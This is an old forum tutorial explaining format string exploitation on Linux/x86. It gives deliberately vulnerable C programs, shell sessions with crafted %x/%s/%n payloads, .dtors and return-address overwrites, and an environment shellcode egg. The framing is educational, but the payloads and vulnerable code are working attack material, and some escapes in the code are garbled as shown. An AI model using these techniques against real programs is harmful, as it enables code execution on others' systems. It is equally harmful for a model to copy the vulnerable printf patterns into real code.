The Mystery of Format String Exploitation
@ Articles -> Security ::: Programming books and docs     Sep 12 2003, 05:50 (UTC+0)

Format strings, and how to exploit them!

rebel writes:

The past month I've been looking alot into format strings, and how to exploit them. It came to my attention while trying to gain knowledge on the subject, that there are not alot of easy to understand / straightforward papers. While most hackers are skilled in the art of hacking, not all of them are very pedagogic ;). I wrote this text for people who want to learn what format strings are and how to exploit insecure code, I tried to make it easy to understand, altough some things may seem tricky at first.

/*
* .: THE MYSTERY OF FORMAT STRING EXPLOITATION :.
* - written by
* BBBBBBBBBBBBBBBB ::: BBBBBBBBBBBBBBBB :::BBBBBBBBBBBBB :::::: BBBBBBBBBBBBBBBBB :: BBBB :::::::::::
* BBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBB :::::: BBBBBBBBBBBBBBBBB :: BBBB :::::::::::
* BBBB BBBB : BBBB : BBBB BBBB :::::: BBBB :: BBBB :::::::::::
* BBBB ...... BBBB : BBBB ........... : BBBB ... BBBB : BBBB .......... :: BBBB :::::::::::
* BBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB :: BBBB :::::::::::
* BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB :: BBBB :::::::::::
* BBBB BBBB : BBBB : BBBB BBBB : BBBB B :: BBBB :::::::::::
* BBBB BBBB . : BBBB ......... : BBBB .... BBBB : BBBB ........... :: BBBB .........
* BBBB : BBBB BBB : BBBB BBBBBBBBBBB : BBBBB BBBBBB BBBB : BBBBBBBBBBBBBBBBB :: BBBB BBBBBBBBBBB
* BBBB : BBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB :: BBBBBBBBBBBBBBBBB
*
* -
* 31/07/03 - 19:25:05
*/

---------------
-> NOTES
---------------
All the examples in this text are on the linux/x86 architecture and it is assumed throughout the text that this is what we are exploiting. Format strings can still be exploited on other OS's, but it works alittle differently, in particular the shellcode is not the same.

---------------
-> REQUIREMENTS
---------------
General C knowledge and basic knowledge about how the stack works is very helpful. If you want to try the examples you'll need linux, gcc, gdb and objdump. A brain might also come in handy. So get yourself some milk & cookies and let's start.

---------------
-> WHAT ARE FORMAT STRINGS
---------------
Format strings are simply a string of characters, with special format string identifiers. If you have programmed in C you are familiar with functions such as printf(). Printf() takes a format string as the first argument, and then variables which the format string will use. Here's an example:

#include <stdio.h>

int main(void)
{
int x = 41705;
printf(
"x = %d= %d.n",x,x/2);
}

This will output "x = 41705, x / 2 = 20852". The first argument is referred to as the format string itself, it contains characters and format string identifiers. In this example, the '%d' identifier was used, '%d' takes a decimal as argument, in this case it was replaced by x, which held the integer value 41705. There are many other format string identifiers, some of them include %x, which is like %d but outputs in hex, %s, which takes a character pointer and prints the string until a nullbyte is encountered and %f, which takes a floating point number.

---------------
-> FS ABUSE
---------------
Now, how can these be abused by an attacker? Try this program:

#include <stdio.h>

int main(int argc, char *argv
[])
{
printf(argv
[1]);
}

This program simply prints its first argument, example:
- [root@knark] ~/research/paper > ./ex2 "Hello world."
Hello world.
- [root@knark] ~/research/paper >

Now, how is this program susceptible to attacks which can allow attackers to execute arbitrary code you ask?
It's simple, printf(argv[1]) should be written as printf("%s",argv[1]).
If %s if forgotten or simply ignored, printf will seek format string identifiers in the buffer itself, in this case argv[1].
Let's try something..

- [root@knark] ~/research/paper > ./ex2 "AAAA %x %x"
AAAA 401438c8 bffffc58
- [root@knark] ~/research/paper >

Uhoh, now you can probably see what's going on. printf() recognized %x as a format string identifier, and then simply did what %x is supposed to do, print the next 4 bytes on the stack in hex. We can also print
whatever we want, from wherever we want. Try this:


#include <stdio.h>

int main(void)
{
char secret
[]="hack.se is lame";
char buffer[512];
char target[512];

printf("secret 
= %pn",&secret);

fgets(buffer,512,stdin);
snprintf(target,512,buffer);
printf("
%s",target);
}


- [root@knark] ~/research/paper > ./ex3
secret = 0xbffffc68
AAAA%x %x %x %x %x %x %x
AAAA4013fe20 0 0 0 41414141 33313034 30326566
- [root@knark] ~/research/paper >

As you can see, format string vulnerabilites apply to all format string functions, in this example sprintf() has been misused. What we do is, we first give it 'AAAA', and then proceed to finding out how far from the
$esp our buffer lies. As we can see, after 5 '%x' we get 41414141. This is a hex representation of AAAA, we now know that our buffer lies 5 * 4 = 20 bytes from the esp. So, how do we get it to print the contents of char secret[]?
Now that we know that our buffer lies 5 ´pops´ from the $esp, we can supply an address for %s. %s takes an address as argument, and prints whatever lies there until a nullbyte is found. We have to supply bffffc68 to %s, since x86 is little endian, we have to reverse it (least significant byte first).

- [root@knark] ~/research/paper > printf "\x68\xfc\xff\xbf%%5\$s" | ./ex3
secret = 0xbffffc68
hüÿ¿hack.se is lame
- [root@knark] ~/research/paper >

tdah! %s printed out the contents of 0xbffffc68, which was char secret[].
Ok, so now you know it's possible to print anything from anywhere using format strings, but how is that
supposed to give you a shell?

---------------
-> WRITING
---------------
There's one format string identifier which I haven't introduced yet, it's what makes em great, %n. %n writes the number of printed bytes to a variable. Try this:


#include <stdio.h>

int main(void)
{
int x = 0;
printf(
"ABCDEFGn%n",&x);
printf("Written bytes
: %dn",x);
}


- [root@knark] ~/research/paper > ./ex4
ABCDEFG
Written bytes: 8
- [root@knark] ~/research/paper >

Well well..since "ABCDEFG\n" is 8 bytes, the value 8 gets written to the address of x. I'm sure you are beginning to see the possibilites with this..just as we can view anything from anywhere with %s, we can write
anything to anywhere with %n. So, let's try this out shall we?


#include <stdio.h>

int main(void)
{
int x = 5;
char buffer
[52];
printf(
"&= %pn",&x);
fgets(buffer,52,stdin);
printf(buffer),
printf("x 
= %dn",x);
}


- [root@knark] ~/research/paper > ./ex5
&x = 0xbffffc74
test
test
x = 5
- [root@knark] ~/research/paper >

We now know that x lies at 0xbffffc74, but just as %s, %n takes an address as argument, which me must supply. Off we go to find the stackpop:

- [root@knark] ~/research/paper > ./ex5
&x = 0xbffffc74
AAAA%x %x %x %x %x %x %x %x %x
AAAA34 4013fe20 401217f4 8049574 8049678 0 0 41414141 25207825
x = 5
- [root@knark] ~/research/paper >

Ok, as we can see, 8 is the offset. As before, we write the format string like this:
[4 byte address]%[offset]$n
the '$' makes it take the argument number that is before '$'. example:


#include <stdio.h>

int main(void)
{
printf(
"%3$d %2$d %1$d.n",1,2,3);
}


- [root@knark] ~/research/paper > ./dollah
3 2 1.

Now, back to the %n thing. &x lies at bffffc74, let's write to it.

- [root@knark] ~/research/paper > printf "\x74\xfc\xff\xbf%%8\$n" | ./ex5
&x = 0xbffffc74
tüÿ¿x = 4
- [root@knark] ~/research/paper >

Just like it should, x gets 4 assigned to it. If we analyze our format string, we can see that because of the address to x we supply which is 4 bytes, the number of bytes printed will be 4, this value is then written to bffffc74.

---------------
-> MKAY, ME WANT SHELL
---------------
So, how can we abuse this to execute arbitrary code? In buffer overflows we overwrite the saved return address with an address to our shellcode, thereby executing anything we want. With format strings it's alittle different, you can overwrite the saved return address, but it's too much of a hazzle when exploiting something locally. As I will explain later this is however a very good option when doing remote format string attacks. The simplest way of local exploitation, is to overwrite the .dtors section of the ELF binary with an address to our shellcode. The .dtors holds memory addresses which point to machine code that is to be executed when the program ends. By default, it holds nothing, but we're gonna change that.

- [root@knark] ~/research/paper > objdump -h ex5 | grep dtors
18 .dtors 00000008 08049648 08049648 00000648 2**2
- [root@knark] ~/research/paper >

From objdump, we can easily find out that DTOR_LIST is at 0x08049648, DTOR_END, which is where we want to store our shellcode address, is always at DTOR_LIST+4, in this case 0x804964c. Obviously, the location
of .dtor section varies from binary to binary. Ok, now we know the addresses to write to, where do we put the shellcode? The easiest way
is to put it in the environment. Let's make an app that puts an egg in the env:


#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

char shellcode
[]=
"x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90"
"xebx13x59x29xc0xb0x04"
"x29xdbx43x29xd2xb2x0a"
"xcdx80x29xc0x40xcdx80"
"xe8xe8xffxffxff"
"HelloKitty";


main(int argc, char *argv[]) {
setenv("EGG",shellcode,1);
system("bash"
);
}


This puts an "egg" in the environment which holds some shellcode that prints "HelloKitty".
Let's move on to finding where its located:


#include <stdio.h>
#include <stdlib.h>
int main(void)
{
printf(
"Egg address: %pn",getenv("EGG"));
}


- [root@knark] ~/research/paper > ./egg
- [root@knark] ~/research/paper > ./getegg
Egg address: 0xbffffdc0
- [root@knark] ~/research/paper >

Okie dokie, we now have all the information we need to craft our very own formatstring. harhar! There are 2 main techniques for making a format string, one is the write-1-byte-at-a-time and the other is..you guessed it, write-2-bytes-at-a-time. How do they differ? Well, not much really, they both do the same thing, but the 2byte at a time one can be a bit tougher on the cpu & memory, personally it is the one I prefer. Let's make one!
destination: 804964c
content bffffdc0
since x86 is little endian, we write it backwards. first, we want to write 0xfdc0(2 bytes) to 804964c, then bfff(2 bytes) to 804964c+2(804964e).
Since we are using %n to write it all, that means we have to use _alot_ of characters to make the internal byte counter for %n to increase. This is not possible since not many buffers allows storing of ~65000 bytes :). We need to trick %n, therefore we use %.u. %.u increases the internal byte counter without taking any real space in the buffer, therefore, printf("%.500uHello%n\n",&x) would make x contain the value 500.
First we put the addresses we want to write to into the format string:

- [root@knark] ~/research/paper > printf "\x4c\x96\x04\x08\x4e\x96\x04\x08" > file

fdc0 = 64960

This is the first value we want to store. Since we have already written 8 bytes (destination addresses), we only need to pad with 64960 - 8 = 64952
We use %hn, not %n, since %hn writes a short, which is what we're writing. (short = 2 bytes)
- [root@knark] ~/research/paper > echo -n "%.64952u%8\$hn" >> file
remember that 8 is the offset to reach our buffer in the format string.
now we have written 64960, and want to write 0xbffff(49151). Here we run into a problem, 49151 is less than 64960 which is what we have already written. We must do a 'rollover'. Instead of writing 0xbfff we write 0x1bfff(114687), the "1" gets discarded anyway and 0xbfff is all that gets written.

already written = 64960
towrite = 114687-64960=49727
- [root@knark] ~/research/paper > echo -n "%.49727u%9\$hn" >> file
- [root@knark] ~/research/paper > cat file | ./ex5
&x = 0xbffffc44
000000000000000000....ALOT OF 0's.....
000000001075052064x = 5
HelloKitty
- [root@knark] ~/research/paper >

tdah! The shellcode got executed, printing out "HelloKitty". As you can see, making a fully automatic local exploit is very easy, using objdump and putting the shellcode in the env. Bruteforcing the offset for %n is also easy. You give the target "AAAA%[n]$x", starting at 1. If the result contains "AAAA41414141" you know you've hit the jackpot.

---------------
-> REMOTE EXPLOITATION
---------------
I will not go into a full depth exploit example, but I will explain my preferred method of remote format string exploitation. As you can see, suddenly everything becomes very complicated when it is a daemon we
are exploiting. We cannot overwrite the dtors by fidning them with objdump, since the binary is on a remote computer. Well, actually, we can overwrite the dtors, but only if it is the exact same binary as one we have installed, for example an ftpd on Redhat 9.0 would have the same .dtors address as another computer, with a totally different setup, as long as it's running Redhat 9.0. What can differ is the offset for %n, but it is very easy to bruteforce. Now, what if we dont want to use
crappy hardcoded targets for our exploit? What if we want to do it completely automatically, i.e bruteforce.
What we need is:
* 'stackpop' offset for %n
* buffer address
* saved return address
The method of finding the buffer address itself isn't that complicated. We simply send:
[4 byte address]%%A%%|%[n]$s
Where address is bruteforced in a loop, starting from 0xbfffffff and working it's way down, and n is the
stackpop. If we receive "%%A%%" somewhere in the output, we know we've hit our buffers address. Here's an example:


#include <stdio.h>

int main(void)
{
char buffer
[512];

bzero(&buffer,512);
printf(
"buffer = %p.n",&buffer);
fgets(buffer,512,stdin);
printf(buffer);
}


- [root@knark] ~/research/paper > ./ex6
buffer = 0xbffffa48.
AAAA%x %x %x %x %x %x %x %x
AAAA200 4013fe20 400124c0 40007986 40000ad8 41414141 25207825 78252078

Stackpop is 6, address of buffer is 0xbffffa48.
- [root@knark] ~/research/paper > printf "\x48\xfa\xff\xbf%%%%A%%%%|%%6\$s" | ./ex6
buffer = 0xbffffa48.
Húÿ¿%A%|Húÿ¿%%A%%|%6$s
- [root@knark] ~/research/paper >

As we can see, %s dumps whats in our buffer. We use "%%A%%" because, if we receive "%%A%%" we know it has not been processed by any format string function. If that would have been the case, we receive "%A%" since
"%%" is an escape sequence for '%' itself. When we have found our buffer address, we can easily calculate the saved return address. In this case, printf first pushes the saved return address onto the stack, which we want to overwrite, then ebp, and then buffer, which is 512 bytes.
Therefore, where the saved ret is depends on the vulnerable function, sprintf(target,buffer); would make ret lie at &target + sizeof(target) + sizeof(buffer) + 4. In printf it lies at bufaddr + 512 + 4. Therefore, in this case ret lies at 0xbffffa48 + 512 + 4 = 0xbffffc4c
0x4141 = 16705 - 8 (remember, 4 byte address for %hn * 2) = 16697

- [root@knark] ~/research/paper > printf "\x4c\xfc\xff\xbf\x4e\xfc\xff\xbf%%.16697u%%6\$hn%%7\$hn" > file
- [root@knark] ~/research/paper > cat file | ./ex6
buffer = 0xbffffa48.
Lüÿ¿Nüÿ¿00000000000...lotsa zeros..i mean lots..really lots..
0000000000Segmentation fault (core dumped)
- [root@knark] ~/research/paper > gdb ./ex6 core
GNU gdb 5.3-debian
Copyright 2002 Free Software Foundation, Inc.
Core was generated by `./ex6'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)

chaching! we overwrote the saved return address with 0x41414141!
As you can see, remote format string exploitation can be a bit tricky, altough not impossible.
I came up with a nice method for speeding up the bufaddr bruteforcing (significantly) while tinkering with an exploit. The technique goes like this: By utilizing ascii codes, we can make a sort of 'pillow' for us to land in, just like with NOP's in buffer overflows. Altough it's not as straightforward. We first send 4 bytes of addresses for %s, just like normal. Then we send as many ascii characters as we can fit into the target buffer, the optimal amount is about ~90. What we do is, we simply start at one char/number. A good one is ASCII = 38/char = &. After that we move up the ascii ladder, by sending ASCII = 39/char = ' and so on. Each character acts as a number of indication, where we have hit in the buffer. So, if we start at ascii 38, the location of bufaddr is always:

[ascii of current location (for example, ASCII = 42/char = *)] - 38 (since we start at 38/& - 4 (the address is 4 bytes).
After we stuff in our ascii chars, we put "%%A%%|%[n]s", where n is the stackpop. With this, we can then determine if we've hit the buffer at all by doing a strstr(result,"%%A%%|");
If it does exist, we know we've hit the buffer, and can do a simple calculation of the start by analyzing the current character. Using this method we can use jumps of [frame]/2 . Where frame is how many ascii characters you've stuffed in the buffer.

---------------
-> BUHBYE
---------------
That's all from me, I hope you enjoyed the text and learned something. If you have any suggestions/comments you can contact me at rebel@bonbon.net. You can also catch me on irc, rebel^@EFnet and rebel@freenode.
Cherio, tata and good luck!

greets: dvdman, dcryptr, RAk, freestyler, nebunu, ntrude, m0lted(ascii dood), xmb, norse, zarwt, q\, suspect

read comments (22) / write comment

recent comments:
backdoor.xts tiano 20.Sep:12:45
DSL P2P Anonymity? zaphod_b 19.Sep:07:50
sooper exxqulood 17.Sep:04:49
Windows XP Pro jeronimo47 15.Sep:10:56
Well done k_aneda 14.Sep:21:57
. . .

views: 4700   printer-friendly version